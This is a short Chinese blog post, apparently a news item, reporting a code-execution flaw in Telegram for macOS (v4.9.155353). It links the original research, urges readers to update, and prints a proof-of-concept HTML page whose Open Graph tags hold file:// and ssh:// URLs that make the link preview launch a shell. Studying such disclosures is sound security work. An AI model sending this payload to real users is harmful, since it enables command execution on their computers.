«

Telegram(macOS v4.9.155353) 代码执行漏洞 PoC

时间:2019-12-9 21:49     作者:admin     分类: 业界新闻


Telegram 是啥不多说:看到了的赶紧更新吧。

详情看GitHub:https://github.com/Metnew/telegram-links-nsworkspace-open

给你发送一个超链接,包含恶意嵌套代码标签,导致命令执行。

POC 如下:

<html>

</head>
    <!--<meta property="og:url"   content="%A0file://google.com/bin/sh" /> Keybase-->
    <meta property="og:url"   content="file://google.com/bin/sh" />
    <meta property="og:type"  content="article" />
    <meta property="og:title" content="file://google.com/bin/sh ssh://google.com/x" />
    <meta property="og:description" content="ssh://google.com/x file://google.com/bin/sh? " />
</head>

</html>

标签: 漏洞

版权所有:Mrxn's Blog
文章标题:Telegram(macOS v4.9.155353) 代码执行漏洞 PoC
除非注明,文章均为 Mrxn's Blog 原创,请勿用于任何商业用途,转载请注明作者和出处 Mrxn's Blog

扫描二维码,在手机上阅读

推荐阅读:

评论:
avatar
头条新闻 2020-01-31 23:21
文章不错支持一下吧
avatar
热搜榜 2020-01-24 01:32
文章不错非常喜欢
avatar
广州技校 2020-01-08 10:18
网站内容还是挺不错的,谢谢博主。还有博客应该是WORDPRESS做的吧,感觉美观度还可以提高,谢谢。我自已是搞前端设计的,你的代码可以做精简一点。
commentator
Mrxn 2020-01-27 12:45
@广州技校:谢谢